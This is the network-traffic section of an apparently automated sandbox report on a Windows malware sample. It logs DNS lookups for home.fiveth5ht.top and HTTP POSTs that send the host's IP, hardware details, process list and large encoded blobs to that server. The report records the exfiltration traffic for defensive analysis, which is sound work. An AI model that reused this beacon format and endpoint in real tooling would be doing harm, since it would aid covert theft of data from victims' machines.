                                                          Dec 28, 2024 09:29:44.005239010 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005249023 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005356073 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005405903 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005492926 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005511999 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005628109 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005637884 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005675077 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005685091 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005742073 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005758047 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005877018 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005886078 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005930901 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.005958080 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006004095 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006059885 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006133080 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006145000 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006180048 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006221056 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006275892 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006285906 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006300926 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006397009 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006412983 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006426096 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006472111 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006521940 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006572962 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006583929 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006616116 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006673098 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006727934 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006737947 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006783009 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006793022 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.006835938 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.057015896 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.057029009 CET804970581.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.712327957 CET4970680192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:44.831842899 CET804970681.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:44.832977057 CET4970680192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:44.833379984 CET4970680192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:44.952824116 CET804970681.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:46.147330046 CET804970681.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:46.147391081 CET804970681.29.149.125192.168.2.7
                                                          Dec 28, 2024 09:29:46.147500038 CET4970680192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:46.149295092 CET4970680192.168.2.781.29.149.125
                                                          Dec 28, 2024 09:29:46.268693924 CET804970681.29.149.125192.168.2.7

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 28, 2024 09:29:35.319353104 CET5286653192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:35.319431067 CET5286653192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:35.459564924 CET53528661.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:35.459621906 CET53528661.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:39.857851028 CET5286953192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:39.858014107 CET5286953192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:40.684885025 CET53528691.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:40.688544989 CET53528691.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:42.363712072 CET5287153192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:42.363838911 CET5287153192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:42.504957914 CET53528711.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:42.505098104 CET53528711.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:44.561491966 CET5287353192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:44.561629057 CET5287353192.168.2.71.1.1.1
                                                          Dec 28, 2024 09:29:44.706149101 CET53528731.1.1.1192.168.2.7
                                                          Dec 28, 2024 09:29:44.706219912 CET53528731.1.1.1192.168.2.7

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Dec 28, 2024 09:29:35.319353104 CET192.168.2.71.1.1.10xbdfeStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:35.319431067 CET192.168.2.71.1.1.10xedf9Standard query (0)httpbin.org28IN (0x0001)false
                                                          Dec 28, 2024 09:29:39.857851028 CET192.168.2.71.1.1.10x323Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:39.858014107 CET192.168.2.71.1.1.10x74eeStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                          Dec 28, 2024 09:29:42.363712072 CET192.168.2.71.1.1.10x37c5Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:42.363838911 CET192.168.2.71.1.1.10x6bc3Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                          Dec 28, 2024 09:29:44.561491966 CET192.168.2.71.1.1.10xec6cStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:44.561629057 CET192.168.2.71.1.1.10xfc0cStandard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Dec 28, 2024 09:29:35.459621906 CET1.1.1.1192.168.2.70xbdfeNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:35.459621906 CET1.1.1.1192.168.2.70xbdfeNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:40.684885025 CET1.1.1.1192.168.2.70x323No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:42.505098104 CET1.1.1.1192.168.2.70x37c5No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                          Dec 28, 2024 09:29:44.706219912 CET1.1.1.1192.168.2.70xec6cNo error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • httpbin.org
                                                          • home.fiveth5ht.top

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.74970481.29.149.125807584C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:29:40.812309980 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 501307
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914075376", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 28, 2024 09:29:40.932890892 CET2472OUTData Raw: 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 59 39 4e 5c 2f 34 4a 53 5c 2f 45 50 56 4e 50
                                                          Data Ascii: n8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6wq8q4iLqyFtWT\/AIJJ\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTd
                                                          Dec 28, 2024 09:29:40.932923079 CET4944OUTData Raw: 77 44 7a 7a 48 2b 66 77 70 4b 44 53 6e 31 2b 58 36 6b 63 6e 62 38 66 36 56 48 55 72 4e 6a 67 64 66 35 66 5c 2f 58 71 4b 67 36 4b 66 58 35 42 56 65 72 46 52 73 76 63 66 6a 5c 2f 6a 51 61 45 64 56 36 6d 5c 2f 6a 5c 2f 77 43 41 5c 2f 77 42 61 52 2b
                                                          Data Ascii: wDzzH+fwpKDSn1+X6kcnb8f6VHUrNjgdf5f\/XqKg6KfX5BVerFRsvcfj\/jQaEdV6m\/j\/wCA\/wBaR+n4\/wBDQaU+vy\/UiooqOTt+P9KDQjooooOgjk7fj\/So6kk7fj\/So6AI5O341HUr9Px\/xqKg6COTt+P9Khl7\/wC9\/jVqoW6ffz\/n8R+dBpT6\/L9SrRViq9aU+vy\/U6KfX5fqQv8AeP4fyFNqxVdt5PCfl
                                                          Dec 28, 2024 09:29:40.932946920 CET2472OUTData Raw: 66 44 42 34 43 6c 53 6a 4a 34 7a 47 30 6f 4b 6e 66 5c 2f 72 6c 7a 62 69 6a 4e 2b 43 65 47 2b 45 4f 49 63 69 6c 6e 2b 44 7a 47 64 44 4c 73 76 71 35 70 77 35 6a 71 65 57 59 5c 2f 41 5a 66 58 79 76 32 6d 49 71 56 38 58 5c 2f 61 57 57 59 71 65 44 76
                                                          Data Ascii: fDB4ClSjJ4zG0oKnf\/rlzbijN+CeG+EOIciln+DzGdDLsvq5pw5jqeWY\/AZfXyv2mIqV8X\/aWWYqeDvShGphcvni8fXnKMMPga75+WbU\/wBlS20uzfUfhx8bfj34Vv8Ay7d9E\/4SP4reLPjL4bivHkT+zYtY8N\/HC9+IranoE11JENZ0yw1XQrqbT5buLSr\/AEi8NreW3yt8e\/h1+z58Wf2V\/wBoz4k6t8B\/h14O+
                                                          Dec 28, 2024 09:29:40.932969093 CET2472OUTData Raw: 74 62 31 78 37 6e 78 35 34 77 30 4f 66 54 46 31 32 38 76 50 73 6e 32 4f 33 74 6f 6e 63 33 44 53 78 66 77 6c 34 6d 30 76 42 76 69 4c 6a 2b 71 76 45 48 67 76 47 35 6a 78 46 4c 4f 38 42 77 7a 69 73 30 6a 6e 65 63 34 4b 68 53 79 72 2b 78 63 6e 78 32
                                                          Data Ascii: tb1x7nx54w0OfTF128vPsn2O3tonc3DSxfwl4m0vBviLj+qvEHgvG5jxFLO8Bwzis0jnec4KhSyr+xcnx2XZ1Uw+WZpgsPDASxefYHI9KCr\/ANoVOWpUm+VP\/a3wvyTi7gXgallvh1nOHyjhungcbn+HyyWEw2YVamZ1syx+Gx+Ajis3w+PxUsW6GVYjM+V4h0I4SN6VOmua31T+xF\/wXHtf2xf2l\/h9+zpcfsy3Hw2m+IN
                                                          Dec 28, 2024 09:29:40.933268070 CET4944OUTData Raw: 62 73 2b 76 2b 66 77 34 5c 2f 79 61 5a 4b 33 37 76 65 5c 2f 77 44 33 38 5c 2f 7a 30 35 78 5c 2f 68 55 33 2b 73 5c 2f 6a 5c 2f 37 5a 5c 2f 38 41 31 76 35 66 79 70 6a 44 64 49 37 37 49 38 66 35 5c 2f 44 6e 6e 5c 2f 77 44 58 51 61 46 62 62 75 6a 35
                                                          Data Ascii: bs+v+fw4\/yaZK37ve\/wD38\/z05x\/hU3+s\/j\/7Z\/8A1v5fypjDdI77I8f5\/Dnn\/wDXQaFbbuj5Pl9oovN\/5ePx\/p37VC3yKjumU6+Z5X4\/\/qq0h2\/u\/wDpl5vmc\/5\/z0pG\/wBZ\/sGL\/Vx5\/wA9u9BpT6\/L9Stt\/j6enmS\/jVZv4XzGH\/1v+f5\/5NWWXdwPnfiKKTr532P0\/D8qY0fL\/wAf+f
                                                          Dec 28, 2024 09:29:40.933316946 CET4944OUTData Raw: 41 6e 78 4a 38 4e 76 64 6e 59 48 66 46 75 75 6f 47 55 37 46 5a 38 4a 38 6f 4a 77 4b 5c 2f 43 53 76 36 48 50 2b 43 48 4c 34 38 4b 5c 2f 74 48 6a 4f 4d 65 49 50 68 65 65 75 4f 75 6e 65 4f 68 5c 2f 37 4c 58 38 75 5c 2f 53 2b 78 6c 66 42 2b 44 39 54
                                                          Data Ascii: AnxJ8NvdnYHfFuuoGU7FZ8J8oJwK\/CSv6HP+CHL48K\/tHjOMeIPheeuOuneOh\/7LX8u\/S+xlfB+D9TGYWXssThOK+GcVh6mj9nXw2MnWpTs003GcIys007a6H9l\/QQw1HG+PeHwWJh7TDYzg3i3C4inr+8oYjA0qVWF001z05Si2mmk7rU9V\/YZ1bwh+0p+xf4y\/YJ+NSz+E\/i38GvDOv\/AAD+LfgQzW1j4n0vRNKu
                                                          Dec 28, 2024 09:29:40.933363914 CET2472OUTData Raw: 35 78 55 50 6d 50 5c 2f 45 6c 7a 5c 2f 72 66 4e 5c 2f 77 42 62 2b 34 5c 2f 7a 39 4b 32 39 5c 2f 77 44 75 5c 2f 69 41 7a 43 66 50 38 38 6e 5c 2f 50 4b 58 7a 4f 6d 50 38 41 50 2b 65 39 50 2b 37 38 6e 37 76 79 5c 2f 77 44 56 48 45 76 74 5c 2f 6e 32
                                                          Data Ascii: 5xUPmP\/Elz\/rfN\/wBb+4\/z9K29\/wDu\/iAzCfP88n\/PKXzOmP8AP+e9P+78n7vy\/wDVHEvt\/n2waFkMe9tgd\/8AVf8A6\/8APvTGkT53dLff28zmCqAZ5jyHfst\/3f5zf57j39qfJvk3v\/qfKi83\/j68\/wA71uvf\/wDVUMi7pNm\/enMsX7o\/zp\/mfcH3+fK94bfH\/Hr\/ANeP8+Otc50BH\/rPO2b3k\/
                                                          Dec 28, 2024 09:29:41.052576065 CET7416OUTData Raw: 2b 45 48 6a 76 77 62 6f 76 38 41 61 61 5c 2f 45 58 77 70 70 75 6e 61 74 34 5c 2f 38 41 47 50 67 76 52 6d 31 50 55 64 6c 35 71 46 6e 59 77 79 33 36 2b 4c 65 48 76 69 74 34 47 38 51 32 75 6b 7a 57 6e 69 5c 2f 77 69 39 5c 2f 65 77 61 70 5c 2f 62 66
                                                          Data Ascii: +EHjvwbov8Aaa\/EXwppunat4\/8AGPgvRm1PUdl5qFnYwy36+LeHvit4G8Q2ukzWni\/wi9\/ewap\/bfh5NT1e317wXqmlavf6VLoXieLXPDuh6TLqU62S6lDJ4V1jxRpkdjeW8N7qNpq8V9pdn+jZX4gcAVs3r8IZRneWrNMorf2fWyfCUK1GOCqUaKqyoRUMNDCU6WHpulGrKnP2GHnXwlCpKnVxeFp1fyPN\/C3xQo5BQ4
                                                          Dec 28, 2024 09:29:41.052685022 CET7416OUTData Raw: 76 38 50 53 6e 79 53 66 75 39 69 4a 5c 2f 71 5c 2f 77 44 6c 70 5c 2f 6e 36 66 30 36 44 6d 51 37 5c 2f 41 44 4e 6e 4c 5c 2f 5a 5c 2f 37 5c 2f 34 66 6a 56 58 64 74 5c 2f 6a 2b 63 63 64 66 5c 2f 4a 72 5c 2f 41 44 36 5c 2f 68 57 68 59 38 73 5c 2f 4b
                                                          Data Ascii: v8PSnySfu9iJ\/q\/wDlp\/n6f06DmQ7\/ADNnL\/Z\/7\/4fjVXdt\/j+ccdf\/Jr\/AD6\/hWhY8s\/Kf9+pJP8AP+f1qH5\/L3n5Py6\/9On8qf8A6wD5P3X\/ACy7\/wCeD+eahXP3D\/pKf9df38P4c\/yrnOvnfl\/XzGTfd+SP5\/8AVS\/9Nv8APXp6fjCyp5jlPnj\/ANV5n\/Lf\/PX9Kvt\/A\/7x\/Ll\/dc9\/
                                                          Dec 28, 2024 09:29:41.097570896 CET27192OUTData Raw: 6d 55 32 57 75 36 72 4c 62 78 7a 51 61 64 63 57 56 6a 39 4b 74 70 57 6c 73 6b 55 62 61 5a 70 37 52 77 6e 4d 4d 62 57 64 75 55 69 50 72 45 70 6a 32 78 6e 33 51 43 6d 79 61 50 70 45 71 4e 48 4c 70 57 6d 79 52 75 4d 4f 6b 6c 6a 61 75 6a 44 30 5a 57
                                                          Data Ascii: mU2Wu6rLbxzQadcWVj9KtpWlskUbaZp7RwnMMbWduUiPrEpj2xn3QCmyaPpEqNHLpWmyRuMOkljaujD0ZWiKsPYgiv5fqfQU4OnGqv9bM75q3D2G4ZnN06C58rocNY7huVKdOCjR9pXp42nmOIxEaUa1fMMryqdSTw+Gnhqv9n0v2kniDTfv8HZDUX9qZxmsXPFY6pUw+IzrNaOZYr6tVq1Z1o04U1jsHRo1alWnCjnObzkp18T


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.74970581.29.149.125807584C:\Users\user\Desktop\xdeRtWCeNH.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 28, 2024 09:29:42.634382010 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                          Host: home.fiveth5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 501307
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 33 37 36 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "8598217652914075376", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe" [TRUNCATED]
                                                          Dec 28, 2024 09:29:42.754112959 CET4944OUTData Raw: 6e 38 50 35 69 6f 61 74 62 57 59 5a 35 2b 70 5c 2f 2b 75 61 6a 66 37 70 5c 2f 44 2b 59 72 6f 4f 55 68 6f 71 58 61 66 37 78 5c 2f 7a 2b 4e 50 6f 41 69 32 48 32 5c 2f 7a 2b 46 47 77 2b 33 2b 66 77 72 39 59 39 4e 5c 2f 34 4a 53 5c 2f 45 50 56 4e 50
                                                          Data Ascii: n8P5ioatbWYZ5+p\/+uajf7p\/D+YroOUhoqXaf7x\/z+NPoAi2H2\/z+FGw+3+fwr9Y9N\/4JS\/EPVNP0bUrX4g2tza63pmmanbTWXg2+u4Ik1O0iuoobiVddQW8qeaIGM6wq8q4iLqyFtWT\/AIJJ\/EG1wdQ+IjaepGd9z8OdZjiwOpWV9cWNtoILYb5QRnGVz\/HOI+n79EzC\/WHX8UsVGnhcRXwlfER8OfFWrhYYjDTd
                                                          Dec 28, 2024 09:29:42.754160881 CET4944OUTData Raw: 7a 5c 2f 38 41 58 77 44 31 70 5c 2f 38 41 73 54 66 4a 35 6e 2b 74 5c 2f 64 66 76 78 31 5c 2f 7a 6e 5c 2f 36 2b 51 43 6d 32 36 53 56 33 5c 2f 77 43 6d 76 6d 6e 31 36 5c 2f 35 5c 2f 6e 36 30 7a 35 5c 2f 6b 33 5c 2f 4a 36 65 5a 46 64 66 35 34 37 66
                                                          Data Ascii: z\/8AXwD1p\/8AsTfJ5n+t\/dfvx1\/zn\/6+QCm26SV3\/wCmvmn16\/5\/n60z5\/k3\/J6eZFdf547frU0cXmeSjp+56+ZJEfP\/AM\/h7euXyfx\/35JfK3yf8tu3+QKC4b\/L9UQs23f8+\/zYrfzfLyM\/6V+P17UyT93\/AB7z\/rf3f7j3p+0qyJ+7\/dy\/9\/v9F\/z9TUO55F+T91wIvLH7\/wD\/AIL\/AD1oNR
                                                          Dec 28, 2024 09:29:42.754192114 CET2472OUTData Raw: 74 62 31 78 37 6e 78 35 34 77 30 4f 66 54 46 31 32 38 76 50 73 6e 32 4f 33 74 6f 6e 63 33 44 53 78 66 77 6c 34 6d 30 76 42 76 69 4c 6a 2b 71 76 45 48 67 76 47 35 6a 78 46 4c 4f 38 42 77 7a 69 73 30 6a 6e 65 63 34 4b 68 53 79 72 2b 78 63 6e 78 32
                                                          Data Ascii: tb1x7nx54w0OfTF128vPsn2O3tonc3DSxfwl4m0vBviLj+qvEHgvG5jxFLO8Bwzis0jnec4KhSyr+xcnx2XZ1Uw+WZpgsPDASxefYHI9KCr\/ANoVOWpUm+VP\/a3wvyTi7gXgallvh1nOHyjhungcbn+HyyWEw2YVamZ1syx+Gx+Ajis3w+PxUsW6GVYjM+V4h0I4SN6VOmua31T+xF\/wXHtf2xf2l\/h9+zpcfsy3Hw2m+IN
                                                          Dec 28, 2024 09:29:42.754236937 CET2472OUTData Raw: 62 73 2b 76 2b 66 77 34 5c 2f 79 61 5a 4b 33 37 76 65 5c 2f 77 44 33 38 5c 2f 7a 30 35 78 5c 2f 68 55 33 2b 73 5c 2f 6a 5c 2f 37 5a 5c 2f 38 41 31 76 35 66 79 70 6a 44 64 49 37 37 49 38 66 35 5c 2f 44 6e 6e 5c 2f 77 44 58 51 61 46 62 62 75 6a 35
                                                          Data Ascii: bs+v+fw4\/yaZK37ve\/wD38\/z05x\/hU3+s\/j\/7Z\/8A1v5fypjDdI77I8f5\/Dnn\/wDXQaFbbuj5Pl9oovN\/5ePx\/p37VC3yKjumU6+Z5X4\/\/qq0h2\/u\/wDpl5vmc\/5\/z0pG\/wBZ\/sGL\/Vx5\/wA9u9BpT6\/L9Stt\/j6enmS\/jVZv4XzGH\/1v+f5\/5NWWXdwPnfiKKTr532P0\/D8qY0fL\/wAf+f
                                                          Dec 28, 2024 09:29:42.754290104 CET4944OUTData Raw: 52 66 34 5c 2f 72 36 64 36 49 34 33 5a 6e 52 49 64 6a 6a 39 7a 5c 2f 72 50 38 38 2b 6e 48 70 55 2b 31 38 35 66 31 38 77 49 66 6b 6a 32 50 2b 38 5c 2f 64 5c 2f 76 63 79 66 36 69 62 5c 2f 50 39 61 4a 50 6c 62 5c 2f 56 5c 2f 36 79 58 39 37 5c 2f 79
                                                          Data Ascii: Rf4\/r6d6I43ZnRIdjj9z\/rP88+nHpU+185f18wIfkj2P+8\/d\/vcyf6ib\/P9aJPlb\/V\/6yX97\/yw\/wA+lHlpu2bPnki\/5Z\/8scn\/ADn609t8e\/d+8\/e+bN5cX+u\/z9O+fSj2vnL+vmdB+80lnDIPkm2P\/wA85D9fwz\/niqMmny\/3Dt5xwO\/uT\/QmrH8f\/Av61ZWR\/wCB\/wDPv\/8AXrE\/yP8AaVK
                                                          Dec 28, 2024 09:29:42.754347086 CET2472OUTData Raw: 4b 68 52 34 55 7a 61 46 4b 6d 6e 4a 71 45 56 6d 38 4c 4a 4f 54 63 6e 76 31 62 5a 58 6f 71 53 54 74 2b 4e 52 31 5c 2f 64 42 5c 2f 6e 57 46 56 36 73 56 45 5c 2f 58 38 50 36 6d 67 42 6c 52 2b 58 37 5c 2f 70 5c 2f 39 65 70 4b 4b 44 6f 4b 39 46 53 53
                                                          Data Ascii: KhR4UzaFKmnJqEVm8LJOTcnv1bZXoqSTt+NR1\/dB\/nWFV6sVE\/X8P6mgBlR+X7\/p\/9epKKDoK9FSSdvx\/pUdADNg9\/wDP4VBmT+9\/n8qtVFI2Pw5P17f596vnfl\/XzOgZULLt9xU1FVzrz\/r5gV6KlaP049j\/AJ\/xqKjnXn\/XzOgr0VJ5fv8Ap\/8AXqOrNKfX5fqRn\/Wr\/umo6k\/5af5\/u1HQaBUcnb8f
